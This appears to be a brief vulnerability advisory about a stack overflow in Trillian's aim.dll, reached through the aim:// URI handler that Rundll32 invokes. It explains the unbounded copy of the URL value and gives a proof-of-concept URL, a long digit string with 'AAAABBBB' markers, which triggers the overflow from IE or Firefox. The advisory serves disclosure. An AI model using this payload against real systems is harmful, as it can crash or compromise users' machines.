Stack Overflow in Trillian’s aim.dll through the aim:// URI

Stack Overflow in Trillian’s aim.dll through the aim:// URI

 

The Trillian application is a tool that allows users to chat across multipleprotocols, such as AIM, IRC, ICQ, Yahoo!, and MSN.

When Trillian is installed, the

aim:// URI will be registered in the Windows Registry and associated with the command

‘Rundll32.exe “C:/Program Files/Trillian/plugins/aim.dll”, aim_util_urlHandler url=”%1”ini="c:/program files/trillian/users/default/cache/pending_aim.ini”’.

 As you can see,calling the aim:// protocol will spawn a Rundll32.exe process which will load aim.dll withthe specified options. The value that is put into aim_util_urlHandler url is controlled bythe user through the URI, such as aim://MyURL. This value is later copied withoutbounds checking and an attacker can use this to cause a stack overflow exception.Accessing the following URL from IE6, IE7, or Firefox will trigger a stackoverflow:

 

aim:///#1111111/1111111111111111111111111111111111111111111111111111111111111

2222222222222222222222222222222222222222222222222222222222222

3333333333333333333333333333333333333333333333333333333333333

4444444444444444444444444444444444444444444444444444444444444

5555555555555555555555555555555555555555555555555555555555555

6666666AAAABBBB6666666666666666666666666666666666666666666666

6666666666666667777777777777777777777777777777777777777777777777777777777777

8888888888888888888888888888888888888888888888888888888888888

9999999999999999999999999999999999999999999999999999999999999

0000000000000000000000000000000000000000000000000000000000000